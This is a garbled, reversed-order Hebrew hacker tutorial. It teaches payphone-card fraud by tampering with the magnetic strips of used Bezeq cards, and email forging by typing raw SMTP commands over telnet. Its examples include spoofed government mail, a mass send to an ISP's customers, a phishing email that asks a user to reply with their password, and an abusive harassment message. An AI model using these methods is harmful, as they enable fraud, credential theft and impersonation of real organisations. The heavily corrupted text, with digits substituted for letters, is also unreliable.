.םישמושמ !ןכ .ם י ש מ ו ש מ םיטרכלט המכ אוצמל םכילע !ןושאר רבד
הזיא לש הלפאח ול ובנגתו ןטקה םכלש חא לש םיטרכלט ףסואל וכל הז ליבשב 9* .
.הפ םכל הארא ינאש קירטה ינפמ םינגומ םישדחהמ הברה המל !םינשי םיטרכלט ףידע
הזיא םכל היהיש ףידע ןכ ומכ 9* הרוקש המו והשמ אצוי אל כדב הז םינושארה תונויסינב יכ
ואידיו תטלק וחתפ וישכע !יקוא .תדבוכמ תומכ םכל היהיש וגאדת ןכל ...סרהנ טרכלטהש הז
.הקיר
הטלקה תקיחמ .שדח היהישו .הילע טלקומ רבד םוש ילב !הקיר היהת תטלקהש דואמ בושח
.ונל רוזעת אל הנשי
.#לכלתי אלש רוחשה לילסה לע ורהז .םינפבש לילסה ןמ קלח תונידעב ורזגו םיירפסמ וחק תעכ
וקיבדה
!ןכמ רחאל .תונטק תוטילב הברה שיש הפיא !טרכלטה לש ןוילעה ירוחאה קלחה לע לילסה תא
ןורפיע םע ורבע
ופילחה םינשיה םחפה םע תונורפעה תאש הסאב .םחפ לש הקד הבכש ראשייש #כ !לילסה לע
.רחא רמוח םע םויכ
ירחא .םחפ ןורפיע אוצמל ידכ םכלש אתבס לש ןשיה תיבל וא הקיפרג תונחל תכלל וצלאית ןכל
קיבדהל םתרמגש
ןמ םחפ לש הקד הבכיש וילע םתראשהו !טרכלטה לע תטלקהמ יטנגמה רוחשה לילסה תא
ותוא וסינכה !ןורפיעה
דומעל לכוי אל יטנגמה יאלגה רשא הכופה תיטנגמ הלועפ הז הפ הרקייש המ .ירוביצ ןופלט #ותל
!וב
.קזב הז יכ !ישפוח ורבד זא .ןופלטה לע הלבגה אלל ישפוח ןמז םכל היהי ןכלו

GeHeNoM
9N
.סמ היש ' רכל יסירכב רזוח שומיש 2
...םיטרכלט רוזחמל היינש הטיש
.םישמושמ !ןכ .ם י ש מ ו ש מ םיטרכלט המכ אוצמל םכילע !ןושאר רבד
הזיא לש הלפאח ול ובנגתו ןטקה םכלש חא לש םיטרכלט ףסואל וכל הז ליבשב 9* .
.הפ םכל הארא ינאש קירטה ינפמ םינגומ םישדחהמ הברה המל !םינשי םיטרכלט ףידע
הזיא םכל היהיש ףידע ןכ ומכ 9* הרוקש המו והשמ אצוי אל כדב הז םינושארה תונויסינב יכ
תלוכמהמ וסייכת וישכע !יקוא .תדבוכמ תומכ םכל היהיש וגאדת ןכל ...סרהנ טרכלטהש הז
.סקפיט
.הלעמל תוטלוב תונטק תודוקנ םיאור .םיטרכלטה דחא לש ירוחאה קלחב וננובתה
!רמגיי טרכלטהש םעפ לכ .תונידעב תאז ושע .סקפיט לש הקד הווש הבכשב םתוא וסכ
"""""""""""ונהית .ארונ אל לבא !שדחמ תאז תושעל וצלאית
.קזב הז יכ !ישפוח ורבדו
Gehenom
9.
#ויז Email קלח ' 1
!יתוא ולאשת םא וישכע דע הבוט יכה הבתכה !תאזה הבתכב
אמגודל ולכותש איה הנווכה .תרמוא תאז המ .ליימ יא ףייזל #יא םכל הארא ינא
.רפש ןורודמ הזה ליימ יאה תא לביק אוהש בושחי םכלש רבחהו ליימ יא םכלש רבחל חולשל
!להנמהמ ליימ יא הרומל חולשל ומכ !םיבוט רתוי םיקוחצל רובעל רשפא םיקוחצמש ןבומכ
ןוגכ טנרטניא קפס לש חוקלל חולשל לשמל ומכ !רתוי םייניצר םירבדל רובעל םג רשפאש וא
.אמסיסהו שמתשמ םשה תא ונממ שקבלו ןי'זיוטנ לש הכימת תווצהמ ליימ יא !אמגודל ןי'זיוטנ
!הלאכ םירקמב םישוע !םירקאהה !ונחנאש המ ןכלו !דושח ול האריי הזש ןבומכ
רבכ רובענש יאדכ תואמגוד #כל ןתא ינאש ינפל לבא .היגולוכיספ תצקב םישמתשמ הז
"""םכלש ןושארה ליימ יאה ףויזל

...( ןשקאה םע דיימ ליחתנ םעפה !והשמ ריבסא ינאש ינפלש יתטלחה Leah, right )
...( ...הז םע קחשל ליחתנו !ונישע המ ריבסא ינא כחא קר Pla) with it )
םע השענ ינושארה ןשקאה תא !םיליחתמ ונחנאש ינפל דחא רבד קר Hot4ail .
םע המל Hot4ail $תוביס המכמ .
.םהילא םימושר םישנא ינוילמ 0
.םישנא ינומהל ןויסינו ןוחטיב םע ליימ יא ףייזל ולכות םתא
םיאנושה ןודעומל ופרטצתו טופוסרקימ תא ואנשת םתא םגש הצור ינא תורחאו הלאכ תוביסמ 0
.תואנושהו
אלש חינהל ריבס !םהלש תוחוקלל םיפיוזמ םיליימ יא חולשל הז לק המכ םכל הארא ינא םא
.#כ לע םתוא ובהאת
.םהלש תוחוקל םתא עגרכש חינהל ריבסש ללגב רקיעב
.תילמרונ ליימ יא תבותכ וגישתו .םתוא וקרזת .םתוא ובזעת ףוס ףוס הככ 0
דוע אל )oukhot4ail%co4 וישכעמ אלא ....ליעגמ )oukan)!thing!else!)a!want%co4
.הפהפי
םימושר אל דוע םתא םא !ליחתהל לכונש ידכב
ל Hot4ail%co4 ל וכל זא HttIh//www%hot4ail%co4 .ומשריתו
................................................
$הרעה
Hot4ail%co%il ו Hot4ail%co4 .רבד ותוא אל הז
לש םייונמה םג Hot4ail%co%il רתאל תכלל םיכירצ
לש Hot4ail%co4 !הז תא ושעת אל םא .םשריהלו
...דובעי אל הפ םולכ זא
ל םושרש ימ קר Hot4ail%co4 תינש םשריהל בייח אל
מ לביקש תבותכב שמתשי אלא Hot4ail%co4
הדות
................................................
ב םכלש ליימ יאהש אמגודל דיגנ .ליחתנ !בוט Hot4ail%co4 אוה hackerkhot4ail%co4
$איה הלשממה שאר לש ליימ יאה תבותכ .הלשממה שארמ ליימ יא םכל חלשנ וישכע ונחנא
roh4kI4o%goV%il
).#ירצ אל ..ונימאת לא .םכל עבשנ .הלשממה שארה לש ליימ יאה תבותכ תמאב תאז !בגא #רד(
$םיאבה םידעצה תא ושעת !יקוא
לחתהה טירפת לע וצחל 0
9;
...הלעפהב ורחב 0
$ודילקה וישכע 0 telnet 4ail%hot4ail%co4 9=
ה רותפכ לע וציחלו nter .
תרשל )..םירבחתמ( םיטנלטמ הז הפ םישוע םצעב ונחנאש המ .טנלט ןולח הז .חתפיי שדח ןולח
לש ראוד
Hot4ail טרופל 9= .םילבלובמ .
....םכל ריבסא ינאו טנלטה ןולח תא ורגסת
.היינשל תחא תורבוחמ םיבשחמ תותשר לש תיקנע תשר םצעב אוה טנרטניאה
!םיתרש !םייתיב םיבשחמ .םיבשחמ ינוילימ ןיב היצמרופניא תרובעת לש לודג דחא ןגלב הז דחיב
!הדובע תונחת Main -ra4es .םיצור אל םתאש המ !םילותח !תוצלפמ !
שי הלאה םיבשחמה לכל אל !וישכע 8indows ...תוחפל םיתרשה בורל .ןיא םבורל !םצעב .
רושקת ילכ #ירצ !תיטרדנטס תחא הלעפה תכרעמ שי םיבשחמה לכל אלש ןוויכמ !הרקמ לכב
.יטרדנטס
הפש #ירצ .םירחא םיבשחמ םע רשקתל ידכ םהיפל #לי בשחמ לכש !םימיוסמ םיקוח #ירצ
.םיבשחמה ןיב תפתושמ
!הברה שי יכ טנרטניא ילוקוטורפה לכ לע הפ רבדל ליחתנ אל וישכע .הפי ....םילוקוטורפ ....#ירצ
תרשל רבחתמ אוה .ןפדפד הז .טנרטניא אל הז םכלש ןברוחמה טנרטניא ןפדפדהש וניבת לבא
H##P .
ה לוקוטורפ יקוח יפלו H##P תפשב( !רתאה לע עדימה תא לבקמ !תרשה םע רשקתמ אוה
H#M7 הז תא םגרתמו )
.ןפדפדב םיאור םתאש המל
!בגא #רד
H##P n H)Ier #e't #ransQer Protocol
#כו וילע םיצחול םתאש טסקט תורחא םילימב וא .טסקט רפיה תרבעה לש לוקוטורפ רמולכ
.רחא טסקטל םירבוע
.בושח אל .םאאאאאתס - תירנוירדומ ודה הפשבו .שולגל - תינרדומה הפשב ארקנש המ
$םילוקוטורפ ינשב שמתשמ תאז תמועל ליימ יא !וישכע 3M#P ו P6P3 .
ב קר שמתשנ וישכע ונחנא 3M#P !ןיינועמש ימל .
3M#P n 3i4Ile Mail #ransQer Protocol
תרשל רבחתמ םכלש טנרטניא ןפדפדהש ומכ קוידב !הז השענש המ !וישכע רוציצוצוציצקבו
H##P טרופל .* !
תרשל רבחתנ ונחנא 3M#P טרופל 9= ןיא יכ תאזה הבתכב הז תא ריבסא אל ינא .הככ .המל .
...םוקמ
ה תא חקינ אמגודלש ומכ !זאו M3 6utlook )תרחא ראוד תנכות לכ וא( קולטואאהש ומכ !םכלש
םע תרשקתמ
( ראודה תרש 3M#P וניימד .תרשה םע רבדנו .יח רוביח השענ .ת י נ ד י השענ ונחנא םעפה הככ !)
וישכעש
.חורפא םתאש וניימד וישכע .םיצור םתאש תרחא ראוד תנכות לכ וא .קולטואא תנכות םתא
..םתאש וניימד .יקוח רבד םה םימס הבש הנידמב םתאש וניימד וישכע
333 .תעשורמה תואיצמל רוזחתו וררועתת וישכע 333
.#ישמנ
םידילקמו !הלעפה !לחתה לע םיצחול telnet .
ונחנאש טרופ הזיאל םיצור ונחנאש תרש הזיאל רבחתהל ונל תנתונש !טנלטה תנכות תא חתפיי הז
.םיצור
רמולכ .רוביחל ןכומו בשחמב חותפש והשמל איה תינכטה הנווכה !ןכבו .)האיצי( טרופ הז המ
רוביחל הכחמ
לש רפסמל םינווכתמ טרופ לע םירבדמשכ ללכ #רדב לבא .)םצעב רחא רבד לכמ וא( רחא בשחממ
.טרופה
3*
טרופ אמגודל .* .
טרופ .* !טנרטניא תרשה הז עדוי אלש ימל H##P .
הזיא #רד עובקל רשפא תרש םיחתופשכ ןורקיעב !הככ אקווד תויהל בייח דימת אל הזש ןבומכ
טרופ כדב לבא .וילא תשגל רשפא היהי טרופ .* טרופ .טנרטניא רתא הז ++* .סנכנ ראוד הז
טרופ 9= טרופל רבחתנ ונחנא ןכלו !אצוי ראוד הז 9= .הככ דימת אקווד ואל הז !בוש לבא .
טרופ אקווד המל תעדל הצורש ימל .* טרופ אקווד המלו טנרטניא תרשל הז 9= !אצוי ראודל
שי טנרטניא לוקוטורפ לכל $הככ זא R-& לכש רמוא אל הז .ותוא רידגמש ! R-& רידגמ
.טנרטניא לוקוטורפ
םג שי R-& תייגולונכט חותיפ לע תורעה םאתס וא !חותיפב השידח הנכות לע וא !החטבא לע
טנרטניא
שי .תרחא וא וזכ R-& שי !קיחצמ R-& .ינימ לכ שי !קופד
R-& n ReOuest -or &o44ents
תא תנכתל לוכי דיחי ןתנכת וא הרבח לכ הככ .לוקוטורפ לכל םיטרדנטסה תא םיעבוק םש !וישכע
תרשה תנכות
הנשמ אלו השעיי םלועב רחא ןתנכת(הרבח לכש םיקוחה םתוא יפל ולש חוקלה תנכות תא וא
הלעפה תכרעמ הזיאל
.רחאה לש חוקל(תרשה םע רשקתל לכוי הז תנכותמ הז
& תרש תנכות 4 אמגודל ררולפסקא טנרטניא & חוקל תנכות $חוקל(תרש( H##P$ ימל + אמגודל
) , ריכמש
תרחא תכרעמ לכו לבונ !סודניוו !סקינוי !שוטניקמ לע ראוד יתרשל רבחתהל לוכי קולטואא ןכל
.םצעב
.םלועבש ראוד תנכות לכמ ליימיא לבקל לוכי טפוסורקימ לש ראודה תרש ןכל
.ןשקא דיימ םכל יתחטבה ירה .ונלש ליימיאה ףויזל רוזחנ וישכע
תנכותל סנכיהל ידכ !בוש .חתפייש חותפ אל ןיידע הז ולצאש ימו !טנלטה ןולחל ורזחת !בוט
טנלטה
ודילקהו !הלעפה !לחתה לע וצחלת #elnet .
טירפת לע וצחל !וישכע #er4inal
... ב ורחב PreQerences
'ש וקדבו 7ocal cho לע וצחל זאו !וישכע ותוא ונמס !ןמוסמ אל אוה םא .ןמוסמ ' 6/ .
הש המ 7ocal cho .דואמ בושח הז .םכלש #סמה לע גצוי תרשל ודילקתש טסקטהש הז השוע
טירפת לע וצחל וישכע &onnect ... ב ורחבו Re4ote 3)ste4
.וילא רבחתהל םכנוצרבש תרשה לע םיטרפ תשקבמש הבית םכל חתפיי ןאכ
Host Na4e ונלש הרקמב .תרשה תבותכ תא ןאכ ודילקה $ 4ail%hot4ail%co4
Port ודילקה .תמצמוצמ איה לבא !המישרהמ רוחבל םג רשפא .טרופה תא םידילקמ ןאכ $ 9=
#er4#)Ie ורחב טושפ !רמוא הז המ תעדל םיכירצ אל עגרכ םתא .רוחבל הימדה הזיאב $ Vt+**
לע וצחל !תעכ &onnect .
.ראוד תרשל רבחתמ הז םיאור םתאש ומכ
וא !#יראת !העשה תא !ותוא התנכתש הרבחה תא םימעפל !אוה הסרג הזיא ונל גיצמ תרשה
.םולכ םימעפל
$גיצמ הז ונלש הרקמב .תרשב יולת לכה הז
99* - HotMail XN6 M&Y 3M#P serVer read) at Mon -eb +9 +*h=;h3; 9***
99* 3M#P sIoken here
...רתוי וא תוחפ
כ כדב( םיוסמ ןמזל טלק םכממ לבקמ אל תרשה םא !וישכע +*!3* תא קתנמ אוה !)תוינש
.רוביחה
תא םכל גיצה הזש ירחא !בוט .םדוקמ יתתנש תוארוהה יפל שדחמ רבחתהל וצלאית הארנכ ןכל
!ולש לבזה
$תואבה תורושה תא ודילקה
3+
Helo hacker
Mail Qro4h roh4kI4o%goV%il
RcIt toh hackerkhot4ail%co4
data
-ro4h ,7 GoVer4ent
3ubeecth ,sraelos GoVer4ent is Proud oQ )ou
$ateh -eb +9 9**+
Hi Hacker
#he ,sraeli GoVer4ent is Ver) Iroud oQ )ou
Lou now haVe the knowledge to Qorge e4ail, which is real cool
"nd useQull too% Please use it correctl) and careQull)
,7 GoVer4net
.
םוקמב קר .והז hackerkhot4ail%co4 .םכלש ליימיאה תא ובתכת
ה לע הציחלש הז הרעה דוע BacksIace הז וליאכ האריי הז !רמולכ .דובעת אל םיוות קוחמל ידכ
!םתוא קחומ
קר !ןווכתמ ינא המל וישכע ריבסא אל ינא .תוא ומכ הז תא ףיסומ הז השוע םצעב הזש המ לבא
ורהזית
ב רזעיהל ולכות אל יכ !הדלקהב תועטל אל BacksIace ה שקמ לע וצחל טושפ !םיעוט םתא םא .
nter זאו
ל וסנכ וישכע .םתיעט לבא דילקהל םתיצרש המ תא בוש ודילקה www%hot4ail%co4 וקדבתו
.םכלש ליימיאה תא
"""""""""""""""""( ....בינגמ אל וא בינגמ .הלשממה שארמ בתכמ םש היהי MagniV )
לע וצחל זאו !בתכמה תא וארק ReIl) !וארתש ומכ .הרזחב בתכמ ול חולשל ידכ
ןיא !ףיוזמ ליימיא םיחלוש םתאש ימל רמולכ .ולש יתימאה ליימיאל הרזח בתכמה תא חלשיי הז
תעדל יוכיס
קלחב !#שמהב .תאזה הבתכה תא ארק אוה ןכ םא אלא .ףיוזמ הזש 3 !הזה #ירדמה לש
.ףיוזמ םתלביקש ליימיאה םא קודבל #יא םכל ריבסא ינא
קלחל םיצפוק םתאש ינפל לבא 3 קלח תא םכל שי ! 9 !
!האבה םעפל דע .םיצור םתאש המכ הז םע קחשל םכל ןתונו דבוע לכה #יא תינכט ריבסמש
GeHeNoM
39
#ויז Email קלח ' 2
.ןגה לא רקובב #לה ןטקה ןתנוי
.שפיח םיחורפא %עה לע ספיט אוה
לודג רוח .בבושל ול יובאו יוא
!לגלגתה %עה ןמ .ויסנכמב
...לביק ושנועו
"""'ליימ יא ףויז' #ירדמה לש ינשה קלחל םיאבה םיכווווווווווווורב
.הז תאו הז תא םישוע #יאו הככ הז הככ המל םכל ריבסא ינא !הז קלחב
!ןורחאהו ישילשה קלחל רובעל םינכומ ויהתש קר אל !הזה קלחה םע ורמגתש ירחא
הזב שמתשהלו !תירבעב תאז תושעל ולכות !םייקש ראוד תרש לכל ליימיא ףייזל ולכות םג אלא
!ןוכנ
רוזחי יטומ - בושח יכהו .ןמזה ותואב םישנא המכל חולשל ולכות .המלו דבוע לכה #יא ןיבהלו
.התיבה רבכ
.ליחתנ !בוט ....עדוי אל הלאוו .יטומ הז ימ
555
' מ חקלנ הפ וארקתש רמוחה בור R-& .9+ ה לוקוטורפ תא רידגמש ' 3M#P .
חיטבמ אל ינא !תאז תורמל .ותוא ןיבהל ולכותש ידכב תירבעל םגרות רמוחה
םגרית אל טלחהב אוהו !ילש תישיאה #רדב השענ הפ םוגרתהו !רבד םוש םכל
ה לש ימשר R-& תא אורקל תילגנא םיעדויש םכמ הלא לכל %ילממ דואמ ינא . R-& .9+ .
6666
!םתאש םישקבמ ראודה יתרש בור !תרש לכב אצמנ אל הז יכ םא זא !בוט
םילבקמ(םיחלוש םתאשכ כדב .םתא ימ ועדייש ידכ תאז .והדזת !ליימיאה תא םיחלושש הלא
ליימיא
!ההדזמ עיגה אוה ונממש תרשה חלשנ אוהש תרש לכל רשאכ .דחא תרשמ רתוי #רד רבוע אוה
תא לבקמש ימ #כו
אל תאזש ןבומכ .םימיוסמ םירקמב ליעי דואמ תויהל לוכי הז .רבע הז הפיא #רד עדוי ליימיאה
הביסה
תדוקפ !הרקמ לכב .דיתעב הב ושמתשת הארנכ םתאש אמגוד התייה םאתס תאז !תירקיעה
$איה תוהדזהה
H76
םישמתשמ אל ללכבש םיתרש הברה שי .הרוצ התואב הדוקפל םיסחייתמ םיתרשה לכ אל !וישכע
!תאזה הדוקפב
איה הדוקפה !תאז תמועל םירחא םיתרשב .התוא והדיי אל םה הדוקפה תא םהל וחלשת םאו
!הידעלבו !הבוח
דיגהל םיבייח אל םתא !םיתרשה בור לצא .ליימיאה תא חולשל ולכות אל H76 תורמל !
ריעי תרשה הארנכש
.םיצור םתאש המ ושעתש הככ .ליימיאה תא וכרד חולשל םכל ןתיי תאז לכב אוה לבא #כ לע םכל
ריהבא קר ינא
הדוקפה $בושח והשמ הפ H76 ובתכת אל םא !רמולכ .תוהדזהל תמרוגש תאז אל איה H76
םתאש רמוא אל הז
תרשה הככ םימעפ הברהו תוהדזהה תא תלמסמ קר הדוקפה .םתא ימ עדוי אל תרשהו םיימינונא
הזיא #רד עדוי םג
33
ומכ קוידב הז םע וקחשתש %ילממ ינא !הרקמ לכב .ןיימוד הזיאמ וא ליימיאה תא וחלש הנכות
הדוקפ לכ םע
לצא .הפ ןתא ינאש 4ail%hot4ail%co4 !הדוקפה תא בותכל וצלאיתש קר אל !אמגודל
.םתא ימ דיגהל וכרטצת םג אלא
$תואמגוד
H76 duction%goV%il
H76 walla%co%il
H76 hacker
H76 -uckLou
H76 ,do

ל רשקב הנורחא הרעה קר .בוט H76 כדב םא תוהדזה תדוקפ תאז המל םיהות םתא םא !
קר םיבתוכ H76 ילב
$םיבתוכ םתאש עגרב !הככ זא !תוהדזהל
H76
ב ביגמ תרשה 7ookuI ובתכת אל םאש רמוא אל הז !בוש לבא .םכלש בשחמה תבותכ תא קדובש
H76 ראודה תרש
....םתא ימ עדיי אל
ה ירחא זא !בוט H76 $האבה הדוקפה האב M",7 .
הדוקפה M",7 עדימה לכ תא )טעמכ( קחמייו !שדח ליימיא תחילש וישכע ליחתיש תרשל תרמוא
וישכע דע ול היהש
םידילקמ .'וכו חלושה תא !ומצע בתכמה ןכות תא !בתכמה תא לבקי ימ ללוכ !רבעש בתכמה לע
הדוקפה תא
$האבה הרוצב
M",7 -R6Mh sender
ה רשאכ sender .ליימיאה תא לבקי ליימיאה תא לבקמש ימ הנממש ראוד תבותכ &
$אמגודל
M",7 -R6Mh Losikhot4ail%co4
M",7 -R6Mh shaOklakers%co4
M",7 -R6Mh 64riknetVision%net%il
הדוקפה תא M",7 םע ביגי אוה !הדוקפה תא לביק תרשהש עגרב .תחא םעפ קר לבקמ תרשה
תיבויח הרעה
רפסמה םע דחי האבש 9=* לש הבוגת ריזחי אל תרשהש םכל הרקי אל םעפ ףאו טעמכ . 9=*
ה תדוקפ ירחא M",7 .
םתאש ול ודיגת םאו .ול םירמואש המל בישקמ !הז הרקמב תרשהש ןוויכמ תאז
)osiksdQ%sdQ%b)e%Quck אוה
הז תא וסנ .תמאב .#כ הז םבור לצא לבא !ראודה יתרש לכל ןוכנ אל הזש ןבומכ .תאז לבקי
.םכמצעב
ןיימודהש םכל דיגי אוה םומיסקמ sdQ%sdQ%b)e%Quck דואמ םיתיעל הרקיי הז לבא .םייק אל
..תוקוחר
םתבתכו הרקמב
M",7 -R6Mh #osikhot4ail%co4
םוקמב
M",7 -R6Mh Losikhot4ail%co4
!םתיצרש המ תא שדחמ ודילקה טושפ
3:
ה תדוקפ ירחאש ןוויכמו M",7 השדחה תבותכה !בתכמה לע ול היהש עדימה תא קחומ תרשה
הדוקפה !הנטק הרעה קר .היוגשה תאז אלו !לבקתת הנוכנהו M",7 תא קוחמל ידכב הדעונ אל
!עדימה
ה תא ןקתל ידכ הלחתהב הזב שמתשהל םיישפוח ושיגרת לבא ...תפסונ הדוקפ שי הז ליבשב
M",7 .
ה ירחא !וישכע M",7 ה עיגמ RP&# ה . R&P# .ליימיאה תא לבקיש הז היהי ימ תרשל רמוא
...רפסמה םע דחי האבש תיבויח הרעה םע ביגמ אוה !תמייק ןכא תבותכהש אצומ תרשה םא
9=* אל אוה םא .
רפסמה םע דחי תילילש הרעהב ביגמ אוה !תבותכה תא אוצמל חילצמ ==* !בל םש אל דועש ימל .
רפסמה 9=* #ישמנ לבא .םירבד דוע םילמסמש םירפסמ דוע שי .הדוקפה תולבקתה תא למסמ
ה םע R&P# .
ה תא R&P# $#כ םיבתוכ
R&P# #6h receiVer
ה רשאכ receiVer .ליימיאה תא לבקיש םדאנבה רמולכ .ןעמנה לש ראודה תבותכ &
$אמגודל
R&P# #6h danielkinter%net%il
R&P# #6h dana+;khot4ail%co4
R&P# #6h web4asterk)ahoo%co4
R&P# #6h 4oronkeducation%goV%il
הדוקפה תא !וישכע R&P# .םיצור םתאש םימעפ המכ הלבגה אלל בותכל רשפא
ףיוזמ ליימיא חולשל םיצור םתייה אמגודל ""דיחי בתכמב הז לכו
והשמ םידילקמו םהלש ראוד תרשל םירבחתמ םתא !תחא םעפב ימואלניב קזב לש תוחוקלה לכל
$הזכ
H76
M",7 -R6Mh suIIortkbe(eOint%net
R&P# #6h user+
R&P# #6h user9
R&P# #6h user3
R&P# #6h user:
R&P# #6h user=
R&P# #6h userJ
ש ןבומכ ...האלה ןכו user+ דע userJ ...םייתימא אקווד ואל םהו יתאצמהש תומש םאתס םה
הדוקפה תא דילקהל רשפא םיאור םתאש ומכ זא R&P# הדוקפה םע .ליימיא לכב םימעפ יפלא
M",7 !תאז תמועל
הדוקפל וישכעו .הז ליבשב שדחמ ליימיאה לכ תא בותכל וצלאית אלא .הז תא תושעל רשפא יא
!ונלש האבה
ה איהש $"#" ה תדוקפ . $"#" תא םיבתוכ ונא !וז הדוקפב רמולכ .ומצע בתכמה תא הליחתמ
.בתכמה
הרושב הדוקנ םידילקמ טושפ .בתכמה תא בותכל ונרמגש תרשל םירמוא #יא !ונרמגש ירחא
.תדרפנ
$אמגודל
$"#"
Hi dann), 8hatos uIp , heard )ou eust got
3=
the latest albu4 oQ 9Iac% what shall i sa)p ,t sucks
,oVe heard it like a thousand ti4es
an)wa), eneo) it
b)e
.
.תדרפנ הרושב היהת איהש יחרכה םג הז .הבושח דואמ ףוסב )הדוקנ( . ה
הדוקפהש הז !בושח והשמ דוע .תירבעב בותכל םג ןבומכ רשפא בתכמה תא $"#" תא םג תללוכ
.םישארה
!#יראתה תא !)םיצור םתא םא תרתוכה וא( אשונה ןוגכ .בתכמה לש תופסותה תא רמולכ
חלושה םש(תבותכ
$#כ םיבתוכ )תופסות( םישארה תא .םירבד המכ דוע םג םימעפלו
$ateh the date goes here
-ro4h the sender
#oh the receiVer
3ubeecth subeect goes here

$אמגודל
$"#"
$ateh 93 6ct ** ++h9;h33
-ro4h Matri'kwalla%co%il
#oh )anirPbrk)ahoo%co4
3ubeecth HaII) Birthda)
Hi Lanir
, 8ish )ou a HaII) Birthda)
HoIe )ouoll eneo) being +=
, bought )ou this real aweso4e thing
Lou 4ust see it
e4ail 4e back as Ouick as )a can to 4atri'kwalla%co%il
c )a, 4atri'
.
תאזה הרושה .ומצע בתכמל )תופסות( םישארה ןיב הלידבמה הקיר הרוש שי !םיאור םתאש ומכ
.תיחרכה איה
.תירבעב םג בותכל רשפא )'וכו אשונ !חלוש( םישארה לש עדימה תא !וישכע
ב םא ןכ ומכ M",7 תפסותב זא !םתישע חוטבש המ !חלושה תבותכ תא םתנייצ -ro4 רשפא
בותכל
!והשמ דוע .הז תא תושעל %למומ דואמ םג הז .ליימיא תבותכ םוקמב יוניכ וא םש
ה לש ןכותה תאש הז $ata המכ םע הז תא םייסנ וישכע .תירבעב בותכל םג רשפא ומצע
םיפיוזמ םיליימיא
יח טלקוה לכה הז .הזה טסקטה ליבשב דחוימ םיגול יתישע .יתימא הפ לכה !בגא #רד .יתחלשש
.טנלטה תנכותמ
ולכות #כו !םכלש םיפויזה תא טילקהל םג םילוכי םתא #יא םכל הארא ינא !תואמגודה ףוסב
הז םע תושעל
$תואמגודה הנה !ןפוא לכב ...המ עדוי אל וא !סיפדהל !םירבחל תוארהל ...םיצור םתאש שמ
99* s4tI%iii%co4 3M#P &PM#"!3P9P3P* ! N6 M&
Helo
9=* - s4tI%iii%co4 Hi .
3J
9=* - P,P7,N,NG
9=* - "M#Hn76G,N
9=* .B,#M,M
Mail Qro4h iiikiii%net%il
9=* ok
RcIt toh iiikiii%co4
9=* ok
$ata
3=: go ahead
$ateh +* NoV +9h3+
3ubeecth rror in ,/6 section
-ro4h iii suIIort tea4
#oh iiikiiii%co4
Hello Qro4 iii%co4 "
,o4 sorr) to inQor4 )ou that there has been an error
in the ,/6 section oQ )our account database, and this serVeros
Iassword inQor4ation has been te4Ioraril) destro)ed% 8e need )ou !
the iii user, to hit reIl) and t)Ie )our Iassword in the subeect .

#hank )ou Qor )our helI !
#he iii suIIort tea4 .
.
9=* ok ;N3.:3++J OI +:.N3
Ouit
99+ s4tI%iii%co4 closing connection
.םוקמב 000 יתמשו היהש המ תא יתקחמש רמוא הז '000' םיאור םתאש םוקמ לכב
.ןעמנו חלוש !תרשה תומש תא ועדת אלש ףידעש יתטלחה .רזנצל ידכ הז תא יתישע
קפס לש שמתשמל ליימיא יתחלש הז הזה ליימיאב יתישעש המ !םיאור םתאש ומכ !הרקמ לכב
!םייוסמ
שקבתמ אוה .קפס ותוא לש הכימתה תווצמ הזה ליימיאה תא לביק אוהש בשוח אוה רשאכ
אמסיסה תא חולשל
ראוד תנכותה !אמסיסה םע ביגמ אוהשכ !וישכע .תרשב היעב הזיא ןקתל ולכויש ידכב ולש
הזש ול תרמוא
ל חלשנ suIIort tea4 .רחא והשימל הז תא חלוש הזש הז הרוק תמאבש המ לבא !קפס ותוא לש
הז תא חלוש הז
ב ונבתכש תבותכל Mail Qro4 וישכע .ראוד תרש לכב הככ דבוע אל הז יתחמש(ירעצל לבא .
$האבה אמגודל
99* ( 000- N6 M&Y 3M#P serVer read) at Mon -eb +9 **h9:h9J 9**+
99* 3M#P sIoken here
helo
=*+ H76 reOuires do4ain address
helo iii%co4
9=* ReOuested 4ail action oka), co4Ileted
rcIt toh iiikiii%co4
=*3 Need M",7 beQore R&P#
4ail Qro4h web4asterkiii%co4
9=* ReOuested 4ail action oka), co4Ileted
rcIt toh iiikiii%co4
3N
==* inValid address
rcIt toh iiikiii%co4
==* ReOuested action not takenhuser account inactiVe
rcIt toh iiikiii%co4
9=* ReOuested 4ail action oka), co4Ileted
data
3=: 3tart 4ail inIutq end with r&R7-j%r&R7- 7
$ateh +3 NoV ;. ++h*=
3ubeecth -uck Lou
-ro4h iii%co4
#oh iiikiii%net

Hi there .
Lou better start shakin )ou Quckin asshole .
Lou da4n eew hater% -uck it 6--% , took )ou site down .
,Q )ou Iut it back uI, ,oll take it down again ...
No Na(is aloud on the net "
3uck it )ou 4otherQucker .

.
9=* ReOuested 4ail action oka), co4Ileted
Ouit
99+ 3erVice closing trans4ission channel
ה תדוקפ תא לבקל םיכסה אל תרשה הזה ליימיאב !םיאור םתאש ומכ H76 שקיבו !ילש
.ןיימוד םג בותכאש
ה ינפל !ןכ ומכ .#ישמהל יל ןתנ אוה כחא קר M",7 יתבתכ RP&# יל דיגהל תרשל םרגש המ
ינאש ינפלש
בתוכ R&P# בותכל ילע M",7 בותכל לכוא הז ירחא קרו R&P# ה תא יתבתכשכ !כחא .
R&P# ריעה תרשה !אבה
ןויסינב קר .םייק אל שמתשמ םשהש יל ריעה אוה ינשה ןויסינבו .הניקת הניא תבותכהש יל
.םיכסה אוה ישילשה
רתוי החונ רושקת תלוכי םהל שיו םייתידודי דואמ כדב םה ראודה יתרש !רמולכ
ןוגכ םירחא םיתרשל רשאמ P6P וא H##P םכל הארא ינא !םדוקמ יתחטבהש ומכ וישכע !בוט .
.םכלש םיפויזה תא טילקהל םילוכי םתא םג #יא
ה ןולח תא וחתיפ #elnet םידילקמ זאו !הלעפה !לחתה לע םיצחול !רכוז אלש ימל . #elnet .
ה טירפת לע וצחל תעכ #er4inal ב ורחבו 3tart 7ogging %בוקה םש תא דילקהל ושקבתת םתא .
וילעש
$אמגודל .ףויזה תא טילקהל םכנוצרב ch<Qake וא ch<)onatan<hacking<test ...םכל אבש המ .
)...ראוד אקווד ואל !םצעב תרש לכ וא( .םיצור םתאש המ ושעתו ראודה תרשל ורבחתת כחא
$ב ורחב !הטלקהה תא םייסל םיצורו םירמוג םתאשכ #er4inal זאו ! 3toI 7ogging .
לש םויס היהי %בוקל .םתטלקה וילעש %בוקה תא וחתיפו !טנלטה ןולח תא ורגס וישכע log .
$אמגודל
test%log
cool%log
Quckit%log
.....'וכו
!ןורחאהו ישילשה קלחל םירבוע םתאש ינפל ןורחא רבד קר .והז
3.
